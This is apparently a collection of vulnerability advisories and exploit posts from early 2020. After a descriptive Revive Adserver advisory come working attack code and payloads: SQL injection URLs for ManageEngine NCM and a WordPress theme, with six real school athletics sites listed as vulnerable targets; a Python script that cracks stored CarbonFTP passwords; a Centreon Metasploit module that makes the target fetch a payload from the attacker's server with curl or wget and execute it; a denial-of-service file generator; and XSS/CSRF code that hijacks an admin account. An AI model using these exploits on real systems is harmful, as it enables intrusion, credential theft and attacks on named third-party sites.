Revive Adserver versions 5.0.3 and below suffer from a cross site scripting vulnerability.

MD5 | 876b5c6e7b14f9d76a23e57cfee6a8f9

========================================================================
Revive Adserver Security Advisory REVIVE-SA-2020-001
------------------------------------------------------------------------
https://www.revive-adserver.com/security/revive-sa-2020-001
------------------------------------------------------------------------
CVE-IDs: t.b.a.
Date: 2020-01-21
Risk Level: Low
Applications affected: Revive Adserver
Versions affected: <= 5.0.3
Versions not affected: >= 5.0.4
Website: https://www.revive-adserver.com/
========================================================================


========================================================================
Vulnerability - Reflected XSS
========================================================================
Vulnerability Type: Improper Neutralization of Input During Web Page
Generation ('Cross-site Scripting') [CWE-79]
CVE-ID: t.b.a.
CVSS Base Score: 4.3
CVSSv3.1 Vector: AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N
CVSS Impact Subscore: 1.4
CVSS Exploitability Subscore: 2.8
========================================================================

Description
-----------
A reflected XSS vulnerability has been discovered in the publicly
accessible afr.php delivery script of Revive Adserver by Jacopo Tediosi.
There are currently no known exploits: the session identifier cannot
be accessed as it is stored in an http-only cookie as of v3.2.2. On
older versions, however, under specific circumstances, it could be
possible to steal the session identifier and gain access to the admin
interface.

Details
-------
The query string sent to the www/delivery/afr.php script was printed
back without proper escaping in a JavaScript context, allowing an
attacker to execute arbitrary JS code on the browser of the victim.


References
----------
https://hackerone.com/reports/775693
https://github.com/revive-adserver/revive-adserver/commit/327aaf10
https://github.com/revive-adserver/revive-adserver/commit/9ec2fa26
https://cwe.mitre.org/data/definitions/79.html



========================================================================
Solution
========================================================================

We strongly advise people to upgrade to the most recent 5.0.4 version of
Revive Adserver.


========================================================================
Contact Information
========================================================================

The security contact for Revive Adserver can be reached at:
.

Please review https://www.revive-adserver.com/security/ before doing so.


--
Matteo Beccati
On behalf of the Revive Adserver Team
https://www.revive-adserver.com/


Source

Park Ticketing Management System version 1.0 suffers from a persistent cross site scripting vulnerability.

MD5 | 1e843f25a9ae3b474d06c5f3b5494406

# Exploit Title: Park Ticketing Management System 1.0 Stored Cross-Site Scripting Vulnerability
# Date: 2020-01-21
# Exploit Author: Priyanka Samak
# Vendor Homepage: https://phpgurukul.com/

# Software Link: https://phpgurukul.com/park-ticketing-management-system-using-php-and-mysql/

# Software: Park Ticketing Management System
# Version : 1.0
# Vulnerability Type: Cross-site Scripting
# Vulnerability: Stored XSS
# Tested on Windows 10
# This application is vulnerable to Stored XSS vulnerability. This
# Vulnerable script: http://localhost/ptms/normal-search.php
# Vulnerable parameter: ‘search ticket’ Input Field

# Payload used: alert(123)
# POC: http://localhost/ptms/normal-search.php in this
# URL you can add the specially crafted Ticket number.
# Click on the search and you will see your Javascript code executes.


Thanks and Regards,

Priyanka Samak

Source

ManageEngine Network Configuration Manager version 12.2 suffers from a remote SQL injection vulnerability in apiKey.

MD5 | e40aede705e7f315c1ee28bc594b9670

# Exploit Title: ManageEngine Network Configuration Manager 12.2 - 'apiKey' SQL Injection
# discovery Date: 2019-01-24
# published : 2020-01-20
# Exploit Author: AmirHadi Yazdani
# Vendor Homepage: https://www.manageengine.com/network-configuration-manager/
# Software Link: https://www.manageengine.com/network-configuration-manager/
# Demo: http://demo.networkconfigurationmanager.com
# Version: <= Build Version : 12.2
# Tested on: win 2012 R2
------------
About ManageEngine Network Configuration Manager(NCM) (From Vendor Site) :

Network Configuration Manager is a multi vendor network change,
configuration and compliance management (NCCCM) solution for switches, routers, firewalls and other network devices.
NCM helps automate and take total control of the entire life cycle of device configuration management.
--------------------------------------------------------

Exploit POC :

# Parameter: apiKey (GET)
# Title: PostgreSQL Time Based Blind
# Vector: AND [RANDNUM]=(SELECT COUNT(*) FROM GENERATE_SERIES(1,[SLEEPTIME]000000))

#Payload:
http://127.0.0.1/api/json/dashboard/getOverviewList?apiKey=1 AND 1398=(SELECT COUNT(*) FROM GENERATE_SERIES(1,3000000))&TimeFrame=hourly&_=1483732552930

--------------------------

Source

Microsoft Windows Media Center is affected by an issue that allows malicious people to bypass the current security standards. The issue can be exploited through specially crafted wma or wmv file containing a script instruction called URL.

MD5 | 76272c9530cfa1cab72a045a339c94c6

Source

Neowise CarbonFTP version 1.4 suffers from an insecure proprietary password encryption implementation.

MD5 | 2f6419d375c7cce9a08d9d668268aeed

[+] Credits: John Page (aka hyp3rlinx)    
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/NEOWISE-CARBONFTP-v1.4-INSECURE-PROPRIETARY-PASSWORD-ENCRYPTION.txt
[+] twitter.com/hyp3rlinx
[+] ISR: ApparitionSec


[Vendor]
www.neowise.com


[Product]
CarbonFTP v1.4

CarbonFTP is a file synchronization tool that enables you to synch local files with a remote FTP server and vice versa.
It provides a step-by-step wizard to select the folders to be synchronized, the direction of the synchronization and option
to set file masks to limit the transfer to specific file types. Your settings can be saved as projects, so they can be
quickly re-used later.

Download: https://www.neowise.com/freeware/
Hash: 7afb242f13a9c119a17fe66c6f00a1c8


[Vulnerability Type]
Insecure Proprietary Password Encryption


[CVE Reference]
CVE-2020-6857


[Affected Component]
Password Encryption


[Impact Escalation of Privileges]
true


[Impact Information Disclosure]
true


[Security Issue]
CarbonFTP v1.4 uses insecure proprietary password encryption with a hard-coded weak encryption key.
The key for locally stored FTP server passwords is hard-coded in the binary. Passwords encoded as hex
are coverted to decimal which is then computed by adding the key "97F" to the result. The key 97F seems
to be the same for all executables across all systems. Finally, passwords are stored as decimal values.

If a user chooses to save the project the passwords are stored in ".CFTP" local configuration files.
They can be found under "C:UsersAppDataRoamingNeowiseCarbonFTPProjects".

e.g.

Password=STRING|"2086721956209392195620939"

Observing some very short password examples we see interesting patterns:

27264 27360 27360 27360 27360 = a
27520 27617 27617 27617 27617 = b
27266 27616 27360 27361 27616 = aab
27521 27616 27616 27616 27616 = ba

Password encryption/decryption is as follows.

Encryption process example.
484C as decimal is the value 18508
97F hex to decimal is the value 2431 (encrypt key)
18508 + 2431 = 20939, the value 20939 would then represent the ascii characters "HL".

To decrypt we just perform the reverse of the operation above.
20939 - 2431 = 18508
Next, convert the decimal value 18508 to hex and we get 484C.
Finally, convert the hex value 484C to ascii to retrieve the plaintext password of "HL".

CarbonFTP passwords less than nine characters are padded using chars from the current password up until
reaching a password length of nine bytes.

The two char password "XY" in encrypted form "2496125048250482504825048" is padded with "XY" until reaching a length
of nine bytes "XYXYXYXYX".

Similarly, the password "HELL" is "2086721956209392195620939" and again is padded since its length is less than nine bytes.

Therefore, we will get several cracked password candidates like: "HELLHELL | HELLHEL | HELLH | HELL | HEL | HE | HELLHELLH"
However, the longer the password the easier it becomes to crack them, as we can decrypt passwords in one
shot without having several candidates to choose from with one of them being the correct password.

Therefore, "LOOOOONGPASSWORD!" is stored as the encrypted string "219042273422734224782298223744247862350210947"
and because it is greater than nine bytes it is cracked without any candidate passwords returned.

From offset 0047DA6F to 0047DAA0 is the loop that performs the password decryption process.
Using the same password "HELL" as example.

BPX @47DA6F

0047DA6F | 8D 45 F0 | lea eax,dword ptr ss:[ebp-10] |
0047DA72 | 50 | push eax |
0047DA73 | B9 05 00 00 00 | mov ecx,5 |
0047DA78 | 8B D3 | mov edx,ebx |
0047DA7A | 8B 45 FC | mov eax,dword ptr ss:[ebp-4] | [ebp-4]:"2086721956209392195620939"
0047DA7D | E8 F6 6B F8 FF | call carbonftp.404678 |
0047DA82 | 83 C3 05 | add ebx,5 |
0047DA85 | 8B 45 F0 | mov eax,dword ptr ss:[ebp-10] | [ebp-10]:"20867"
0047DA88 | E8 AF AD F8 FF | call carbonftp.40883C |
0047DA8D | 2B 45 F8 | sub eax,dword ptr ss:[ebp-8] | ;<======= BOOOM ENCRYPT/DECRYPT KEY 97F IN DECIMAL ITS 2431
0047DA90 | 66 89 06 | mov word ptr ds:[esi],ax |
0047DA93 | 83 C6 02 | add esi,2 |
0047DA96 | 8B 45 FC | mov eax,dword ptr ss:[ebp-4] | [ebp-4]:"2086721956209392195620939"
0047DA99 | E8 7A 69 F8 FF | call carbonftp.404418 |
0047DA9E | 3B D8 | cmp ebx,eax |
0047DAA0 | 7E CD | jle carbonftp.47DA6F |


Ok, simple explanation after SetBPX in 47DA88...

At offset 0047DA8D, 97F is subtracted at [ebp-8] local variable which equals the decimal value 2431 (hex 97F)
we also see EAX holds the value 55C4
sub eax,dword ptr ss:[ebp-8]
therefore, 55C4 – 97F = 4C45 <======= ENCRYPT/DECRYPT KEY PROCESS.
mov word ptr ds:[esi],ax
add esi, 2 which is 4C45 + 2 = 4C47 <===== THEN

Given a two letter combination like "HL":
484C as decimal is 18508
97F hex to decimal is 2431
18508 + 2431 = 20939 = "HL"

Done!


[Exploit/POC]
"CarbonFTPExploit.py"

import time, string, sys, argparse, os
from pkgutil import iter_modules

#Sample test password
#LOOOOONGPASSWORD! = 219042273422734224782298223744247862350210947

key="97F" #2431 in decimal, the weak hardcoded encryption key within the vuln program.
chunk_sz=5 #number of bytes we must decrypt the password by.

#Password is stored here:
#C:UsersAppDataRoamingNeowiseCarbonFTPProjects.CFTP

#Neowise CarbonFTP v1.4
#Insecure Proprietary Password Encryption
#By John Page (aka hyp3rlinx)
#Apparition Security
#===================================================

def haslib(lib):
if not lib in (name for loader, name, ispkg in iter_modules()):
print("[!] "+lib+ " does not exist, pip install "+lib)
exit()
return True


def carbonftp_conf(conf_file):
p=""
pipe=-1
passwd=""
lst_of_passwds=[]
try:
for p in conf_file:
idx = p.find("Password=STRING|")
if idx != -1:
pipe = p.find("|")
if pipe != -1:
passwd = p[pipe + 2: -2]
print(" Password found: "+ passwd)
lst_of_passwds.append(passwd)
except Exception as e:
print(str(e))
return lst_of_passwds


def reorder(lst):
k=1
j=0
for n in range(len(lst)):
k+=1
j+=1
try:
tmp = lst[n+k]
a = lst[n+j]
lst[n+j] = tmp
lst[n+k] = a
except Exception as e:
pass
return ''.join(lst)


def dec2hex(dec):
tmp = str(hex(int(dec)))
return str(tmp[2:])


def hex2ascii(h):
h=h.strip()
try:
hex_val = h.decode("hex")
except Exception as e:
print("[!] Not a valid hex string.")
exit()
filtered_str = filter(lambda s: s in string.printable, hex_val)
return filtered_str


def chunk_passwd(passwd_lst):
lst = []
for passwd in passwd_lst:
while passwd:
lst.append(passwd[:chunk_sz])
passwd = passwd[chunk_sz:]
return lst


cnt = 0
passwd_str=""
def deob(c):

global cnt, passwd_str

tmp=""

try:
tmp = int(c) - int(key, 16)
tmp = dec2hex(tmp)
except Exception as e:
print("[!] Not a valid CarbonFTP encrypted password.")
exit()

b=""
a=""

#Seems we can delete the second char as its most always junk.
if cnt!=1:
a = tmp[:2]
cnt+=1
else:
b = tmp[:4]

passwd_str += hex2ascii(a + b)

hex_passwd_lst = list(passwd_str)
return hex_passwd_lst


def no_unique_chars(lst):
c=0
k=1
j=0
for i in range(len(lst)):
k+=1
j+=1
try:
a = lst[i]
b = lst[i+1]
if a != b:
c+=1
elif c==0:
print("[!] Possible one char password?: " +str(lst[0]))
return lst[0]
except Exception as e:
pass
return False


def decryptor(result_lst):

global passwd_str, sz

final_carbon_passwd=""

print(" Decrypting ... n")
for i in result_lst:
print("[-] "+i)
time.sleep(0.1)
lst = deob(i)

#Re-order chars to correct sequence using custom swap function (reorder).
reordered_pass = reorder(lst)
sz = len(reordered_pass)

#Flag possible single char password.
no_unique_chars(lst)

print("[+] PASSWORD LENGTH: " + str(sz))
if sz == 9:
return (reordered_pass[:-1] + " | " + reordered_pass[:-2] + " | " + reordered_pass[:-4] + " | " +
reordered_pass[:-5] +" | " + reordered_pass[:-6] + " | "+ reordered_pass[:-7] + " | " + reordered_pass)

#Shorter passwords less then nine chars will have several candidates
#as they get padded with repeating chars so we return those.

passwd_str=""
return reordered_pass


def display_cracked_passwd(sz, passwd):
if sz==9:
print("[*] PASSWORD CANDIDATES: "+ passwd + "n")
else:
print("[*] DECRYPTED PASSWORD: "+passwd + "n")


def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument("-u", "--user", help="Username to crack a directory of Carbon .CFTP password files")
parser.add_argument("-p", "--encrypted_password", help="Crack a single encrypted password")
return parser.parse_args()


def main(args):

global passwd_str, sz
victim=""

haslib("clint")

if args.user and args.encrypted_password:
print("[!] Supply a victims username -u or single encrypted password -p, not both.")
exit()

print("[+] Neowise CarbonFTP v1.4")
time.sleep(0.1)
print("[+] CVE-2020-6857 Insecure Proprietary Password Encryption")
time.sleep(0.1)
print("[+] Discovered and cracked by hyp3rlinx")
time.sleep(0.1)
print("[+] ApparitionSecn")
time.sleep(1)

#Crack a dir of carbonFTP conf files containing encrypted passwords -u flag.
if args.user:
victim = args.user
os.chdir("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/")
dir_lst = os.listdir(".")
for c in dir_lst:
f=open("C:/Users/"+victim+"/AppData/Roaming/Neowise/CarbonFTPProjects/"+c, "r")
#Get encrypted password from conf file
passwd_enc = carbonftp_conf(f)
#Break up into 5 byte chunks as processed by the proprietary decryption routine.
result_lst = chunk_passwd(passwd_enc)
#Decrypt the 5 byte chunks and reassemble to the cleartext password.
cracked_passwd = decryptor(result_lst)
#Print cracked password or candidates.
display_cracked_passwd(sz, cracked_passwd)
time.sleep(0.3)
passwd_str=""
f.close()


#Crack a single password -p flag.
if args.encrypted_password:
passwd_to_crack_lst = []
passwd_to_crack_lst.append(args.encrypted_password)
result = chunk_passwd(passwd_to_crack_lst)
#Print cracked password or candidates.
cracked_passwd = decryptor(result)
display_cracked_passwd(sz, cracked_passwd)


if __name__=="__main__":

parser = argparse.ArgumentParser()

if len(sys.argv)==1:
parser.print_help(sys.stderr)
exit()

main(parse_args())



[POC Video URL]
https://www.youtube.com/watch?v=q9LMvAl6LfE


[Network Access]
Local


[Severity]
High


[Disclosure Timeline]
Vendor Notification: Website contact form not working, several attempts : January 12, 2020
CVE Assigned by mitre : January 13, 2020
January 20, 2020 : Public Disclosure



[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Source

WordPress WP Fanzone theme version 3.1 suffers from a remote SQL injection vulnerability.

MD5 | b7837f56e2fe77a07ca4896ec9f73ed6

###################################################################

# Exploit Title : Built with WordPress and WP FanZone Themes 3.1 SQL Injection
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 20/01/2020
# Vendor Homepage : wordpress.org - wpdevshed.com/wp-fanzone-theme/
# Software Download Link : downloads.wordpress.org/theme/wp-fanzone.3.1.zip
# Software Version : 3.1
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dork : Built with WordPress and WP FanZone site:ca
# Vulnerability Type : CWE-89 [ Improper Neutralization of
Special Elements used in an SQL Command ('SQL Injection') ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos

###################################################################

# Description About Software :
****************************
WP Fan Zone was designed orginally with sports fans and bloggers in mind,
but it could easily be used for any type of blog or magazine style site that wants to
feature images and content. It is fully responsive, comes with two main menus, and
widget areas for all page types. It also has customization options for social media
links, color scheme and author bios, plus a simple banner widget for putting ads in the header.

###################################################################

# Impact :
***********
Built with WordPress and WP FanZone 3.1 is prone to an SQL-injection vulnerability because
it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or
modify data, or exploit latent vulnerabilities in the underlying database.
A remote attacker can send a specially crafted request to the vulnerable application and
execute arbitrary SQL commands in application`s database. Further exploitation of this
vulnerability may result in unauthorized data manipulation.
An attacker can exploit this issue using a browser or with any SQL Injector Tool.

###################################################################

# Administrator Login Path :
***************************
/admin/adminLogin.php
/admin/convenorLogin.php
/admin/coachLogin.php
/index.php/department-heads/
/wp-login.php

# SQL Injection Exploit :
**********************
/weeklySchedule.php?schoolid=[ID-NUMBER]&date=ALL&leagueid=[ID-NUMBER]&divisionid=[SQL Injection]

###################################################################

# Example Vulnerable Sites :
*************************
LOSSA – Lake Ontario Secondary School Athletics

[+] lossa.on.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

LKSSAA – Lambton Kent Secondary School Athletic Association

[+] lkssaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

Sudbury District Secondary Schools' Athletic Association

[+] sdssaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

BCSSAA – Brant County Secondary Schools' Athletic Association

[+] bcssaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

Huron Perth Athletic Association

[+] hpathletics.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

NRHSAA – Niagara Region High School Athletic Association

[+] nrhsaa.ca/weeklySchedule.php?schoolid=17&date=ALL&leagueid=16&divisionid=1%27

###################################################################

# Example SQL Database Error :
****************************
Failed Query: SELECT gameid, hometeamid, homessid, awayteamid, awayssid, dateandtime,
specialnotes, DATE_FORMAT(dateandtime, '%h:%i %p') AS gametime, DATE_FORMAT
(dateandtime, '%W, %M %e, %Y') as formattedDate, substring(dateandtime, 1, 10) AS gdate,
scoreupdated, hometeamscore, hometeamstats, awayteamscore, awayteamstats,
schedule_results.leagueid AS leagueid, sportName, levelName, genderName, leagueName,
locationName, locations.locationid AS locationid FROM schedule_results, sports, leagues,
locations, levels, genders WHERE sports.sportid = leagues.sportid AND schedule_results.
locationid = locations.locationid AND levels.levelID = leagues.levelID AND genders.genderID =
leagues.genderID AND scheduleLive = 1 AND YEARWEEK(dateandtime) = '202003' AND
schedule_results.leagueid = leagues.leagueid AND (hometeamid = 17 OR awayteamid = 17)
AND schedule_results.leagueid = '16' AND (hometeamid IN (SELECT schoolid FROM
standings WHERE leagueid = 16 AND divisionid = 1') OR awayteamid IN (SELECT schoolid
FROM standings WHERE leagueid = 16 AND divisionid = 1')) ORDER BY dateandtime,
leagueid
SQL Error: You have an error in your SQL syntax; check the manual that corresponds
to your MariaDB server version for the right syntax to use near '') OR awayteamid IN
(SELECT schoolid FROM standings WHERE leagueid = 16 AND div' at line 1

###################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

###################################################################

Source

This Metasploit module exploits an authenticated remote code execution vulnerability in Centreon version 19.04.

MD5 | 08423215f6164a41be95f6c0ff55b39b

####################################################################
# This module requires Metasploit: https://metasploit.com/download #
# Current source: https://github.com/rapid7/metasploit-framework #
####################################################################

class MetasploitModule < Msf::Exploit::Remote
Rank = NormalRanking

include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Exploit::EXE

def initialize(info = {})
super(update_info(info,
"Name" => "Centreon Authenticated Macro Expression Location Setting Handler Code Execution",
"Description" => %q{
Authenticated Remote Code Execution on Centreon Web Appliances.
Affected versions: =< 18.10, 19.04
By amending the Macros Expression's default directory to / we are able to execute system commands and obtain a shell as user Apache.
Vendor verified: 09/17/2019
Vendor patched: 10/16/2019
Public disclosure: 10/18/2019
},
"License" => MSF_LICENSE,
'Author' => [
'TheCyberGeek', # Discovery
'enjloezz' # Discovery and Metasploit Module
],
'References' =>
[
['URL','https://github.com/centreon/centreon/pull/7864'],
['CVE','2019-16405']
],
"Platform" => "linux",
"Targets" => [
["Centreon", {}],
],
"Stance" => Msf::Exploit::Stance::Aggressive,
"Privileged" => false,
"DisclosureDate" => "Oct 19 2019",
"DefaultOptions" => {
"SRVPORT" => 80,
},
"DefaultTarget" => 0
))

register_options(
[
OptString.new("TARGETURI", [true, "The URI of the Centreon Application", "/centreon"]),
OptString.new("USERNAME", [true, "The Username of the Centreon Application", "admin"]),
OptString.new("PASSWORD", [true, "The Password of the Centreon Application", ""]),
OptString.new("TARGETS", [true, "The method used to download shell from target (default is curl)", "curl"]),
OptInt.new("HTTPDELAY", [false, "Number of seconds the web server will wait before termination", 10]),
]
)
end

def exploit
begin
res = send_request_cgi(
"uri" => normalize_uri(target_uri.path, "index.php"),
"method" => "GET",
)
@phpsessid = res.get_cookies
/centreon_token".*value="(?.*?)"/ =~ res.body

unless token
vprint_error("Couldn't get token, check your TARGETURI")
return
end
res = send_request_cgi!(
"uri" => normalize_uri(target_uri.path, "index.php"),
"method" => "POST",
"cookie" => @phpsessid,
"vars_post" => {
"useralias" => datastore["USERNAME"],
"password" => datastore["PASSWORD"],
"centreon_token" => token,
},
)
unless res.body.include? "You need to enable JavaScript to run this app"
fail_with Failure::NoAccess "Cannot login to Centreon"
end
print_good("Login Successful!")
res = send_request_cgi(
"uri" => normalize_uri(target_uri.path, "main.get.php"),
"method" => "GET",
"cookie" => @phpsessid,
"vars_get" => {
"p" => "60904",
"o" => "c",
"resource_id" => 1,
},
)
/centreon_token".*value="(?.*?)"/ =~ res.body
res = send_request_cgi(
"uri" => normalize_uri(target_uri.path, "main.get.php"),
"vars_get" => {
"p" => "60904",
},
"method" => "POST",
"cookie" => @phpsessid,
"vars_post" => {
"resource_name": "$USER1$",
"resource_line": "/",
"instance_id": 1,
"resource_activate": 1,
"resource_comment": "Nagios Plugins Path",
"submitC": "Save",
"resource_id": 1,
"o": "c",
"initialValues": "" "a:0:{}" "",
"centreon_token": token
},
)
begin
Timeout.timeout(datastore["HTTPDELAY"]) { super }
rescue Timeout::Error
vprint_error("Server Timed Out...")
end
rescue ::Rex::ConnectionError
vprint_error("Connection error...")
end
end

def primer
@pl = generate_payload_exe
@path = service.resources.keys[0]
binding_ip = srvhost_addr

proto = ssl ? "https" : "http"
payload_uri = "#{proto}://#{binding_ip}:#{datastore["SRVPORT"]}/#{@path}"
send_payload(payload_uri)
end

def send_payload(payload_uri)
payload = "/bin/bash -c "" + ( datastore["method"] == "curl" ? ("curl #{payload_uri} -o") : ("wget #{payload_uri} -O") ) + " /tmp/#{@path}""
print_good("Sending Payload")
send_request_cgi(
"uri" => normalize_uri(target_uri.path, "main.get.php"),
"method" => "POST",
"cookie" => @phpsessid,
"vars_get" => { "p": "60801", "command_hostaddress": "", "command_example": "", "command_line": payload, "o": "p", "min": 1 },
)
end

def on_request_uri(cli, req)
print_good("#{peer} - Payload request received: #{req.uri}")
send_response(cli, @pl)
run_shell
stop_service
end

def run_shell
print_good("Setting permissions for the payload")
res = send_request_cgi(
"uri" => normalize_uri(target_uri.path, "main.get.php"),
"method" => "POST",
"cookie" => @phpsessid,
"vars_get" => {
"p": "60801",
"command_hostaddress": "",
"command_example": "",
"command_line": "/bin/bash -c "chmod 777 /tmp/#{@path}"",
"o": "p",
"min": 1,
},
)

print_good("Executing Payload")
res = send_request_cgi(
"uri" => normalize_uri(target_uri.path, "main.get.php"),
"method" => "POST",
"cookie" => @phpsessid,
"vars_get" => {
"p": "60801",
"command_hostaddress": "",
"command_example": "",
"command_line": "/tmp/#{@path}",
"o": "p",
"min": 1,
},
)
end
end

Source

Sysax Multi Server version 5.50 suffers from a denial of service vulnerability.

MD5 | e4152fb84751bd6f869db1e761ae31c5

# Exploit Title: Sysax Multi Server 5.50 - Denial of Service (PoC)
# Google Dork: NA
# Date: 2020-01-20
# Exploit Author: Shailesh Kumavat
# Vendor Homepage: https://www.sysax.com/
# Software Link: https://www.sysax.com/download.htm#sysaxserv
# Version: Sysax Multi Server 5.50
# Tested on: WIndow 7
# CVE : [if applicable]

1) Download software install in window 7
2)run software then click install license
3) upload crash.key file and it will show run again this program
4 ) program crash , never run


#!/usr/bin/python

buffer = "A" * 1000

payload = buffertry:
f=open("crash.key","w")
print("[+] Creating %s bytes evil payload." %len(payload))
f.write(payload)
f.close()
print("[+] File created!")except:
print("File cannot be created.")

Source

Adive Framework version 2.0.8 suffers from a persistent cross site scripting vulnerability.

MD5 | e8a97ac0caa8d68a4cd900417cf3af78

# Exploit Title:  Adive Framework 2.0.8 - Persistent Cross-Site Scripting
# Exploit Author: Sarthak Saini
# Dork: N/A
# Date: 2020-01-18
# Vendor Link : https://www.adive.es/
# Software Link: https://github.com/ferdinandmartin/adive-php7
# Version: 2.0.8
# Category: Webapps
# Tested on: windows64bit / mozila firefox

1) Persistent Cross-site Scripting at user add page

Description : The parameter 'userUsername=' is vulnerable to Stored Cross-site scripting

Payload:- alert(1)

POST /admin/user/add HTTP/1.1
Host: 192.168.2.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 62
Origin: http://192.168.2.5
DNT: 1
Connection: close
Referer: http://192.168.2.5/admin/user/add
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
Upgrade-Insecure-Requests: 1

userName=test&userUsername=alert('xss')&pass=test&cpass=test&permission=3


|----------------------------------------------------------------------------------


2) account takeover - cross side request forgery


Description : attacker can craft a malicious javascript and attach it to the stored xss, when admin visits the /admin/user page the payload will trigger.

-> Save the payload as exp.js

-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-
function execute()
{
var nuri ="http://192.168.2.5/admin/config";
xhttp = new XMLHttpRequest();
xhttp.open("POST", nuri, true);
xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
xhttp.withCredentials = "true";
var body = "";
body += "rnrn";
body +=
"userName=Administrator&confPermissions=1&pass=hacked@123&cpass=hacked@123&invokeType=web";
xhttp.send(body);
return true;
}

execute();
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-

-> Start a server and host the exp.js. Send the exp.js file in the xss payload

Payload:-

POST /admin/user/add HTTP/1.1
Host: 192.168.2.5
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 143
Origin: http://192.168.2.5
DNT: 1
Connection: close
Referer: http://192.168.2.5/admin/user/add
Cookie: PHPSESSID=3rglrbjn0372tf97voajlfb1j4
Upgrade-Insecure-Requests: 1

userName=%3Cscript+src%3D%22http%3A%2F%2F192.168.2.5%2Fexp.js%22%3E%3C%2Fscript%3E&userUsername=test&pass=test&cpass=test&permission=3


-> As soon as admin will visit the page the payload will be triggered and the admin password will be changed to hacked@123

|-----------------------------------------EOF-----------------------------------------

Source